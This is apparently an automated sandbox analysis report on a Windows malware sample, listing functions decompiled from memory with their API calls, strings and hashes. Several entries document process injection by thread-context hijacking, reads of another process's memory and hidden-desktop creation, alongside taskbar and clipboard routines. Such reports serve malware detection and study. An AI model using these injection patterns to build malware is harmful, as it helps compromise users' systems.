Opcode Fuzzy Hash: 409e000f26243f0af7133e79178066b0551e3b14de60c6b035731291dcf1e78f
Instruction Fuzzy Hash: A251E065200B8482FB25DF22E89476A77A0FB88FD4F44C1289E4E47B29DF3CC58AC704

Uniqueness

Uniqueness Score: -1.00%

Function 00C82F5C, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 149
timeregistryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E00C82F5C(void* __eflags, long long __rbx, signed int __rcx, long long __rsi, void* __r8, void* __r9) {
				void* __rbp;
				void* _t85;
				int _t86;
				intOrPtr _t97;
				signed long long _t101;
				intOrPtr _t104;
				signed int _t112;
				long long _t121;
				signed int _t122;
				void* _t139;
				WNDCLASSA* _t141;
				signed int _t142;
				long long _t144;
				struct HWND__* _t146;
				void* _t147;
				void* _t149;
				void* _t150;
				void* _t154;
				CHAR* _t156;
				long long _t157;

				_t154 = __r9;
				_t152 = __r8;
				_t144 = __rsi;
				_t123 = __rbx;
				 *((long long*)(_t149 + 0x10)) = __rbx;
				 *((long long*)(_t149 + 0x18)) = __rsi;
				_t147 = _t149 - 0x47;
				_t150 = _t149 - 0x100;
				_t142 = __rcx;
				 *((intOrPtr*)(_t147 + 0x67)) =  *((intOrPtr*)(__rcx + 0x778));
				_t112 = 0;
				E00C77DBC(_t147 + 0x67, _t147 + 0x17);
				 *(_t147 - 0x39) =  *(_t147 - 0x39) & 0;
				 *(_t147 - 0x29) =  *(_t147 - 0x29) & 0;
				 *(_t147 - 0x25) =  *(_t147 - 0x25) & 0;
				 *((long long*)(_t147 - 0x31)) = E00C83848;
				GetModuleHandleA(_t156);
				 *((long long*)(_t147 - 0x21)) = E00C83848;
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp-0x19], xmm0");
				asm("xorps xmm1, xmm1");
				 *((long long*)(_t147 + 7)) = _t147 + 0x17;
				asm("movdqa [ebp-0x9], xmm1");
				RegisterClassA(_t141);
				_t121 = "Tahoma";
				r9d = 0;
				 *((long long*)(_t150 + 0x68)) = _t121;
				 *(_t150 + 0x60) =  *(_t150 + 0x60) & 0;
				r8d = 0;
				 *(_t150 + 0x58) =  *(_t150 + 0x58) & 0;
				 *(_t150 + 0x50) =  *(_t150 + 0x50) & 0;
				 *(_t150 + 0x48) =  *(_t150 + 0x48) & 0;
				 *((intOrPtr*)(_t150 + 0x40)) = 0xee;
				 *(_t150 + 0x38) =  *(_t150 + 0x38) & 0;
				 *(_t150 + 0x30) =  *(_t150 + 0x30) & 0;
				 *(_t150 + 0x28) =  *(_t150 + 0x28) & 0;
				 *((intOrPtr*)(_t150 + 0x20)) = 0x190;
				CreateFontA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				r8d = 0;
				 *((long long*)(_t142 + 0x180)) = _t121;
				E00C7B940(_t121, __rbx, _t147 - 0x39, "Shell_TrayWnd", __rsi, _t147, __r8);
				r8d = 0;
				 *((long long*)(_t142 + 0x188)) = _t121;
				_t157 = _t121;
				E00C7B940(_t121, _t123, _t121, "ReBarWindow32", _t144, _t147, _t152);
				r8d = 0;
				 *((long long*)(_t142 + 0x190)) = _t121;
				E00C7B940(_t121, _t121,  *((intOrPtr*)(_t142 + 0x188)), "TrayNotifyWnd", _t144, _t147, _t152);
				_t139 = _t147 - 0x49;
				 *((long long*)(_t142 + 0x198)) = _t121;
				GetWindowRect(_t146);
				_t85 = E00C7BE5C();
				if(_t85 != 1) {
					_t97 =  *((intOrPtr*)(_t147 - 0x41));
					if(_t85 != 2) {
						r8d =  *(_t147 - 0x3d);
						r10d =  *(_t147 - 0x45);
						r9d =  *((intOrPtr*)(_t147 - 0x49));
					} else {
						_t53 = _t121 + 1; // 0x1
						r9d = _t53;
						r8d =  *0xc95510; // 0x1e
						_t97 = _t97 -  *((intOrPtr*)(_t147 - 0x49)) - r9d;
						r10d =  *(_t147 - 0x3d);
						r8d = r8d + 0xfffffffb;
						r8d = r8d + r10d;
					}
				} else {
					r8d =  *(_t147 - 0x3d);
					r8d = r8d -  *(_t147 - 0x45);
					_t101 =  *0xc95510; // 0x1e
					if(r8d > _t101) {
						r8d = r8d - _t101;
						r8d = _t101;
						asm("cdq");
						_t112 = r8d >> 1;
					}
					r9d =  *((intOrPtr*)(_t147 - 0x41));
					_t104 =  *0xc95514; // 0x1e
					r8d = r8d - (0x66666667 * r8d >> 0x20 >> 2) + (0x66666667 * r8d >> 0x20 >> 2 >> 0x1f);
					_t97 = _t104 + 0xfffffffb + r9d;
					r8d = r8d + _t112;
					r10d = _t144 + _t139;
				}
				_t122 =  *((intOrPtr*)(_t147 - 0x21));
				 *(_t150 + 0x58) = _t142;
				 *(_t150 + 0x50) = _t122;
				r8d = r8d - r10d;
				 *(_t150 + 0x48) =  *(_t150 + 0x48) & 0x00000000;
				 *((long long*)(_t150 + 0x40)) = _t157;
				 *(_t150 + 0x38) = r8d;
				 *(_t150 + 0x30) = _t97 - r9d;
				 *(_t150 + 0x28) = r10d;
				 *((intOrPtr*)(_t150 + 0x20)) = r9d;
				r9d = 0x54010000;
				_t86 = CreateWindowExA(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
				 *(_t142 + 0x178) = _t122;
				if(_t122 != 0) {
					r9d = 0;
					r8d = 0x3e8;
					_t70 = _t154 + 0x64; // 0x64
					SetTimer(??, ??, ??, ??);
					r9d = 0;
					r8d = _t70;
					_t86 = SetTimer(??, ??, ??, ??);
				}
				return _t86;
			}

0x00c82f5c
0x00c82f5c
0x00c82f5c
0x00c82f5c
0x00c82f5c
0x00c82f61
0x00c82f6a
0x00c82f6f
0x00c82f80
0x00c82f83
0x00c82f8a
0x00c82f8c
0x00c82f91
0x00c82f9b
0x00c82fa0
0x00c82fa3
0x00c82fa7
0x00c82fad
0x00c82fb1
0x00c82fb8
0x00c82fc1
0x00c82fc4
0x00c82fc8
0x00c82fcd
0x00c82fd3
0x00c82fda
0x00c82fdd
0x00c82fe5
0x00c82fe9
0x00c82fec
0x00c82ff2
0x00c82ff6
0x00c82ffa
0x00c83002
0x00c83006
0x00c8300a
0x00c8300e
0x00c83016
0x00c8301c
0x00c83028
0x00c8302f
0x00c83034
0x00c83037
0x00c83048
0x00c8304b
0x00c8305e
0x00c83061
0x00c8306b
0x00c83070
0x00c83074
0x00c8307e
0x00c83087
0x00c8308f
0x00c830e2
0x00c830e8
0x00c83108
0x00c8310c
0x00c83110
0x00c830ea
0x00c830ed
0x00c830ed
0x00c830f1
0x00c830f8
0x00c830fb
0x00c830ff
0x00c83103
0x00c83103
0x00c83091
0x00c83091
0x00c83095
0x00c83099
0x00c830a2
0x00c830a4
0x00c830aa
0x00c830ad
0x00c830b2
0x00c830b2
0x00c830b4
0x00c830ca
0x00c830d3
0x00c830d6
0x00c830d9
0x00c830dc
0x00c830dc
0x00c83114
0x00c8311c
0x00c83124
0x00c83129
0x00c8312c
0x00c83132
0x00c83137
0x00c83143
0x00c83149
0x00c8314e
0x00c83153
0x00c83159
0x00c8315f
0x00c83169
0x00c8316b
0x00c8316e
0x00c83177
0x00c8317d
0x00c8318d
0x00c83190
0x00c83193
0x00c83193
0x00c831b0

APIs

Part of subcall function 00C77DBC: wsprintfA.USER32 ref: 00C77E0C

GetModuleHandleA.KERNEL32 ref: 00C82FA7
RegisterClassA.USER32 ref: 00C82FCD
CreateFontA.GDI32 ref: 00C83016

Part of subcall function 00C7B940: FindWindowExA.USER32 ref: 00C7B986

Part of subcall function 00C7B940: Sleep.KERNEL32(?,?,?,00C68A63,?,?,?,?,?,00C61F56,?,?,?,00C6203D), ref: 00C7B975

GetWindowRect.USER32 ref: 00C8307E

Part of subcall function 00C7BE5C: GetWindowRect.USER32 ref: 00C7BE65

CreateWindowExA.USER32 ref: 00C83159
SetTimer.USER32 ref: 00C8317D
SetTimer.USER32 ref: 00C83193

Strings

Shell_TrayWnd, xrefs: 00C8301F
ReBarWindow32, xrefs: 00C8303E
gfff, xrefs: 00C830B8
TrayNotifyWnd, xrefs: 00C83057
Tahoma, xrefs: 00C82FD3

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$CreateRectTimer$ClassFindFontHandleModuleRegisterSleepwsprintf
String ID: ReBarWindow32$Shell_TrayWnd$Tahoma$TrayNotifyWnd$gfff
API String ID: 522669638-365627327
Opcode ID: 1a8775feb051e10ab7119c5e8995331f8012d64879da011d2dae2137674834c5
Instruction ID: 1487b1d9a03b7b908351295bce41e35ed92f26b8b2e3c8ca0d60c768344e56c6
Opcode Fuzzy Hash: 1a8775feb051e10ab7119c5e8995331f8012d64879da011d2dae2137674834c5
Instruction Fuzzy Hash: 17618B33B24A908BE724CF65E841B9D77B5F348B98F509219EA8A53E18DF38D614CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C64CC8, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 80threadnativeinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C64CF3
VirtualAllocEx.KERNEL32 ref: 00C64D19
NtGetContextThread.NTDLL ref: 00C64D36
memcpy.NTDLL ref: 00C64D8F
WriteProcessMemory.KERNEL32 ref: 00C64DC2
NtSetContextThread.NTDLL ref: 00C64DD5
ResumeThread.KERNEL32 ref: 00C64DE7
Sleep.KERNEL32 ref: 00C64DF2
SuspendThread.KERNEL32 ref: 00C64DFC
GetLastError.KERNEL32 ref: 00C64E04

Strings

@, xrefs: 00C64D11

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Thread$Context$AllocErrorLastMemoryProcessResumeSleepSuspendVirtualWritememcpymemset
String ID: @
API String ID: 1761926231-2766056989
Opcode ID: 1cc2922956f305c59228975e9a9a445e1337bdd3054dbf68854302a85569a418
Instruction ID: 61be7e2b05d5d784082012778ddc027db4d0d0aa5432ba31433a734fc91cf084
Opcode Fuzzy Hash: 1cc2922956f305c59228975e9a9a445e1337bdd3054dbf68854302a85569a418
Instruction Fuzzy Hash: 4A316232304F45D6EB64CF12E894B9AB364F788B84F808525DB9E47B64EF38C559C740

Uniqueness

Uniqueness Score: -1.00%

Function 00C63C6C, Relevance: 16.7, APIs: 11, Instructions: 208memorystringCOMMON

Download Yara Rule

APIs

StrRChrW.SHLWAPI(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63CB8
lstrlenA.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63CDE
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63D2B
lstrcmpiW.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63D37
lstrlenW.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63D59
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63DB1
lstrcmpiW.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63E24
HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63ED4
HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63EEC
HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63F04
HeapFree.KERNEL32(?,?,?,?,?,?,00000002,?,00000000,00000000,00000000,00000000,?,00C63870), ref: 00C63F1C

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FreeHeap$ByteCharMultiWidelstrcmpilstrlen
String ID:
API String ID: 2788117228-0
Opcode ID: 353940b687fbbd0efc4b0573de4e8962611e655daa13c303d173d90becb156e5
Instruction ID: 3037e83ac761e8f6ba42174badfbd5a27007247cbe87916347f040e1928869cd
Opcode Fuzzy Hash: 353940b687fbbd0efc4b0573de4e8962611e655daa13c303d173d90becb156e5
Instruction Fuzzy Hash: 3381C132600BC186EB349F7198847A973A1FB44FA8F488325EE6667B95DF34C786C304

Uniqueness

Uniqueness Score: -1.00%

Function 00C83CC0, Relevance: 16.6, APIs: 11, Instructions: 83
clipboardmemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E00C83CC0(void* __ecx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9) {
				int _t15;
				int _t26;
				void* _t43;
				void* _t68;
				long long _t75;
				void* _t76;
				void* _t78;

				_t43 = _t78;
				 *((long long*)(_t43 + 8)) = __rbx;
				 *((long long*)(_t43 + 0x10)) = _t75;
				 *((long long*)(_t43 + 0x18)) = __rsi;
				 *((long long*)(_t43 + 0x20)) = __rdi;
				_t76 = r8d;
				_t68 = __rcx;
				E00C7F480(__rbx, __rcx);
				_t45 = _t43;
				if(_t43 == 0) {
					L8:
					GetLastActivePopup();
					goto L9;
				} else {
					_t74 = _t68 + 0x88;
					if(E00C7C050(_t43, _t45, _t68 + 0x88, _t43, _t68 + 0x88) == 0 || E00C7C134(_t45, _t45) == 0) {
						goto L8;
					} else {
						_t26 = IsIconic();
						_t37 = _t26;
						if(_t26 != 0) {
							goto L8;
						} else {
							_t66 = _t45;
							E00C7BA38(_t37, _t43, _t45, _t74, _t45, _t74, __r8, __r9);
							_t38 = _t43;
							if(_t43 != 0) {
								_t66 = _t43;
								_t45 = _t43;
								E00C7C170(_t38, _t43, _t43, _t68, _t43, _t74, _t76, __r8, __r9);
							}
							E00C7BD68(_t45, _t66);
							if(_t43 != 0) {
								L9:
								_t45 = _t43;
							}
						}
					}
				}
				_t15 = OpenClipboard();
				if(_t15 != 0) {
					GlobalAlloc();
					if(_t43 != 0) {
						GlobalLock();
						memcpy(??, ??, ??);
						 *((char*)(_t76 + _t43)) = 0;
						GlobalUnlock(??);
						if(EmptyClipboard() != 0) {
							SetClipboardData();
						}
						GlobalFree();
					}
					_t15 = CloseClipboard();
				}
				return _t15;
			}

0x00c83cc0
0x00c83cc3
0x00c83cc7
0x00c83ccb
0x00c83ccf
0x00c83cd9
0x00c83cdf
0x00c83ce2
0x00c83ce7
0x00c83ced
0x00c83d4b
0x00c83d52
0x00000000
0x00c83cef
0x00c83cef
0x00c83d03
0x00000000
0x00c83d11
0x00c83d14
0x00c83d1a
0x00c83d1c
0x00000000
0x00c83d1e
0x00c83d1e
0x00c83d24
0x00c83d29
0x00c83d2c
0x00c83d2e
0x00c83d34
0x00c83d37
0x00c83d37
0x00c83d3f
0x00c83d47
0x00c83d58
0x00c83d58
0x00c83d58
0x00c83d47
0x00c83d1c
0x00c83d03
0x00c83d5e
0x00c83d66
0x00c83d76
0x00c83d82
0x00c83d87
0x00c83d99
0x00c83da1
0x00c83da6
0x00c83db4
0x00c83dbe
0x00c83dbe
0x00c83dc7
0x00c83dc7
0x00c83dcd
0x00c83dcd
0x00c83ded

APIs

IsIconic.USER32 ref: 00C83D14

Part of subcall function 00C7BA38: GetWindowLongPtrA.USER32 ref: 00C7BA6C
Part of subcall function 00C7BA38: GetLastActivePopup.USER32 ref: 00C7BA80
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BA9D
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAAB
Part of subcall function 00C7BA38: GetWindowInfo.USER32 ref: 00C7BAC4
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAD2
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB1B
Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB2F

Part of subcall function 00C7C170: GetWindowLongPtrA.USER32 ref: 00C7C1B7
Part of subcall function 00C7C170: GetAncestor.USER32 ref: 00C7C1CC
Part of subcall function 00C7C170: GetWindowThreadProcessId.USER32 ref: 00C7C211
Part of subcall function 00C7C170: GetWindowThreadProcessId.USER32 ref: 00C7C23D
Part of subcall function 00C7C170: GetCurrentThreadId.KERNEL32 ref: 00C7C245
Part of subcall function 00C7C170: AttachThreadInput.USER32 ref: 00C7C25B
Part of subcall function 00C7C170: BringWindowToTop.USER32 ref: 00C7C264
Part of subcall function 00C7C170: SetForegroundWindow.USER32 ref: 00C7C26D
Part of subcall function 00C7C170: SetActiveWindow.USER32 ref: 00C7C276
Part of subcall function 00C7C170: SetFocus.USER32 ref: 00C7C27F
Part of subcall function 00C7C170: AttachThreadInput.USER32 ref: 00C7C290
Part of subcall function 00C7C170: SetWindowPos.USER32 ref: 00C7C2BC

GetLastActivePopup.USER32 ref: 00C83D52
OpenClipboard.USER32 ref: 00C83D5E
GlobalAlloc.KERNEL32 ref: 00C83D76
GlobalLock.KERNEL32 ref: 00C83D87
memcpy.NTDLL ref: 00C83D99
GlobalUnlock.KERNEL32 ref: 00C83DA6
EmptyClipboard.USER32 ref: 00C83DAC
SetClipboardData.USER32 ref: 00C83DBE
GlobalFree.KERNEL32 ref: 00C83DC7
CloseClipboard.USER32 ref: 00C83DCD

Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093

Part of subcall function 00C7C134: IsWindowVisible.USER32 ref: 00C7C141
Part of subcall function 00C7C134: GetWindowLongPtrA.USER32 ref: 00C7C153

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Thread$ClipboardGlobal$ActiveLong$AncestorAttachInputLastPopupProcess$AllocBringCloseCurrentDataEmptyFocusForegroundFreeIconicInfoLockOpenUnlockVisiblememcpy
String ID:
API String ID: 1754987310-0
Opcode ID: 673b9f61747a7b65ccbe8144bdd32e1e4f630637ef949e179fcd102509c62865
Instruction ID: fed3daa6238929a0617b9874d0347530aa6c6695ed49b5829584cd66c29c0cd1
Opcode Fuzzy Hash: 673b9f61747a7b65ccbe8144bdd32e1e4f630637ef949e179fcd102509c62865
Instruction Fuzzy Hash: B231941131278182FE14AB23AD5476A63A1BB89FC5F489139DE1E4BB55EF3CC6068318

Uniqueness

Uniqueness Score: -1.00%

Function 00C83460, Relevance: 15.1, APIs: 10, Instructions: 85
threadCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00C83460(void* __edx, void* __edi, long long __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r14, long long _a8, long long _a16, long long _a24) {
				void* _v8;
				void* _v536;
				void* _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				void* _v568;
				intOrPtr _v580;
				intOrPtr _v584;
				void* __rdi;
				int _t28;
				void* _t56;
				long long _t57;
				void* _t59;
				intOrPtr _t78;
				long long _t79;
				intOrPtr _t81;
				void* _t91;

				_t91 = __r14;
				_t57 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t78 =  *((intOrPtr*)(__rcx + 0x190));
				_t59 = __rcx;
				_t81 =  *((intOrPtr*)(__rcx + 0x198));
				if(__edx != 0x64) {
					__eflags = __edx - 0x65;
					if(__edx == 0x65) {
						_t28 = E00C7F480(__rcx, __rcx);
						__eflags =  *((intOrPtr*)(_t59 + 0x178)) - _t57;
						if( *((intOrPtr*)(_t59 + 0x178)) != _t57) {
							GetWindowThreadProcessId();
							_t28 = GetKeyboardLayout(??);
							_t79 = _t57;
							__eflags =  *((intOrPtr*)(_t59 + 0x150)) - _t57;
							if( *((intOrPtr*)(_t59 + 0x150)) != _t57) {
								r8d = 0x104;
								L00C87402();
								r9d = 0x104;
								GetLocaleInfoW(??, ??, ??, ??);
								CharUpperBuffW(??, ??);
								r8d = 4;
								memcpy(??, ??, ??);
								 *((long long*)(_t59 + 0x150)) = _t79;
								goto L10;
							}
						}
					}
				} else {
					GetWindowRect();
					GetWindowRect(??, ??);
					GetWindowRect(??, ??);
					if(E00C7BE5C() != 1) {
						__eflags = _v580 - _v556 -  *0xc95510; // 0x1e
					} else {
						_t56 = _v584 - _v560 -  *0xc95514; // 0x1e
					}
					if(_t56 >= 0) {
						L10:
						r9d = 0x501;
						r8d = 0;
						__eflags = 0;
						_t28 = RedrawWindow(??, ??, ??, ??);
					} else {
						E00C831B4(_t56, _t59, _t59, _t78, _t81, _t91);
						r9d = 0x501;
						r8d = 0;
						RedrawWindow(??, ??, ??, ??);
						_t28 = E00C832C0(0, _t56, _t57, _t59, _t59, _t81);
					}
				}
				return _t28;
			}

0x00c83460
0x00c83460
0x00c83460
0x00c83465
0x00c8346a
0x00c83477
0x00c8347e
0x00c83481
0x00c83492
0x00c83520
0x00c83523
0x00c83529
0x00c8352e
0x00c83535
0x00c83540
0x00c83548
0x00c8354e
0x00c83551
0x00c83558
0x00c83564
0x00c83569
0x00c83576
0x00c8357e
0x00c8358e
0x00c8359b
0x00c835a6
0x00c835ab
0x00000000
0x00c835ab
0x00c83558
0x00c83535
0x00c83498
0x00c834a0
0x00c834ae
0x00c834bc
0x00c834cd
0x00c834e7
0x00c834cf
0x00c834d7
0x00c834d7
0x00c834ed
0x00c835b2
0x00c835b9
0x00c835bf
0x00c835c2
0x00c835c4
0x00c834f3
0x00c834f6
0x00c83502
0x00c83508
0x00c8350d
0x00c83516
0x00c83516
0x00c834ed
0x00c835e2

APIs

GetWindowRect.USER32 ref: 00C834A0
GetWindowRect.USER32 ref: 00C834AE
GetWindowRect.USER32 ref: 00C834BC

Part of subcall function 00C7BE5C: GetWindowRect.USER32 ref: 00C7BE65

RedrawWindow.USER32 ref: 00C8350D
GetWindowThreadProcessId.USER32 ref: 00C83540
GetKeyboardLayout.USER32 ref: 00C83548
GetLocaleInfoW.KERNEL32 ref: 00C8357E
CharUpperBuffW.USER32 ref: 00C8358E
memcpy.NTDLL ref: 00C835A6
RedrawWindow.USER32 ref: 00C835C4

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Window$Rect$Redraw$BuffCharInfoKeyboardLayoutLocaleProcessThreadUppermemcpy
String ID:
API String ID: 241760697-0
Opcode ID: b27478d8b1a071e956e4b8695433fd4f216d61e4f1b932a4897c1fda21cfaeab
Instruction ID: 4846769770eb8c3f05ddff9885e38aa374f61d6e417caa5b34ee1ae54f76fad9
Opcode Fuzzy Hash: b27478d8b1a071e956e4b8695433fd4f216d61e4f1b932a4897c1fda21cfaeab
Instruction Fuzzy Hash: F5317335304A90C6EB10EB25E488BAD6771F7C5F88F949531EE4A47B58CF79C64ACB04

Uniqueness

Uniqueness Score: -1.00%

Function 00C82E70, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 30memorylibrarynativeCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,?,?,00C7FAAC,?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C82E7B
GetModuleHandleW.KERNEL32(?,?,?,?,00C7FAAC,?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C82E88
GetProcAddress.KERNEL32(?,?,?,?,00C7FAAC,?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C82EA4
NtQuerySystemInformation.NTDLL ref: 00C82ECE
HeapAlloc.KERNEL32(?,?,?,?,00C7FAAC,?,?,00000000,00C6C7CA,?,?,?,?,00000008,00C68C59), ref: 00C82EE4
GetTickCount.KERNEL32 ref: 00C82EF1

Strings

GetSystemTimes, xrefs: 00C82E9A
KERNEL32.DLL, xrefs: 00C82E81

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressAllocCountCriticalHandleHeapInformationInitializeModuleProcQuerySectionSystemTick
String ID: GetSystemTimes$KERNEL32.DLL
API String ID: 3912391235-2746141200
Opcode ID: dbebd6719b1df7ea6f3e8ce633ee618c483ef52dc90e13ad19f630840d7e2c76
Instruction ID: 159941e4b6e4fc87869bf3bcb04b9e37420083f84e3de3690b2d9090def3e6b3
Opcode Fuzzy Hash: dbebd6719b1df7ea6f3e8ce633ee618c483ef52dc90e13ad19f630840d7e2c76
Instruction Fuzzy Hash: D0019234612F41D1FB16DB66FC59B5833A1FB88B51FC68225D80A02B70EF3C854AC708

Uniqueness

Uniqueness Score: -1.00%

Function 00C6502C, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 162nativeCOMMON

Download Yara Rule

APIs

ZwQueryInformationProcess.NTDLL(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C65079
ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C650CF
ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C650F5
ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C65141
ReadProcessMemory.KERNEL32(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C651BA
StrRChrA.SHLWAPI(?,?,KERNEL32.DLL,?,?,?,00000000,00000002,00000000,00000000,00C6491B,00000000,?,LoadLibraryA,?,00000000), ref: 00C651F5

Strings

KERNEL32.DLL, xrefs: 00C65049

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Process$MemoryRead$InformationQuery
String ID: KERNEL32.DLL
API String ID: 3059065599-2576044830
Opcode ID: 3fa409b58d0cfc8d0464434912f54dceb7c79e7910b056cbd8d2ed3be3b55fd4
Instruction ID: 14a7db013b93d90370c6a1298b6798b230e56f671e995934631996dcb2c32fe2
Opcode Fuzzy Hash: 3fa409b58d0cfc8d0464434912f54dceb7c79e7910b056cbd8d2ed3be3b55fd4
Instruction Fuzzy Hash: 0B51DF73314B859BDB20DF21E890B9A77A4F748B84F548125EF9D43B04DB38DA69CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C7D800, Relevance: 12.1, APIs: 8, Instructions: 94stringCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32 ref: 00C7D844
GetLastError.KERNEL32 ref: 00C7D852
GetDC.USER32 ref: 00C7D861
GetDeviceCaps.GDI32 ref: 00C7D872
GetDeviceCaps.GDI32 ref: 00C7D887
ReleaseDC.USER32 ref: 00C7D899
lstrcpyA.KERNEL32 ref: 00C7D8F7
CloseDesktop.USER32 ref: 00C7D955

Memory Dump Source

Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp Download File
